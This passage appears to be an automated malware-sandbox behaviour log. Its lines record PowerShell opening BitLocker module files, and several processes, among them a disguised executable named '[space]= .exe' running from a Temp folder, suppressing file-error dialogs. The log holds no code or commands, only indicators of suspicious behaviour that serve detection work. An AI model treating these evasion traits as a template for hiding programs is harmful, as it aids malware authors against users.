Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
